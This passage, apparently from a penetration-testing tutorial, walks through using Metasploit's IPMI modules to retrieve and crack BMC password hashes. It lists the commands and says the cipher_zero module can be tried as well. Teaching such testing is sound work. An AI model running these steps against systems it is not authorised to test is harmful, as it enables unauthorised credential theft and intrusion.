Let's perform the following steps:
- We start Metasploit:
- Search for IPMI-related exploits using the following command:
search ipmi
The output of the preceding command is shown in the following screenshot:
- Use the IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
vulnerability; we choose auxiliary. There are multiple exploits, such as cipher_zero, which can be tried as well:
use auxiliary/scanner/ipmi/ipmi_dumphashes
- To see options, type the following command:
show options
The output of the preceding command is shown in the following screenshot:
Here we see the auxiliary automatically attempts to crack the hashes it retrieves.
- Set the RHOSTS and run. On successful exploitation, we will see the hashes retrieved and cracked: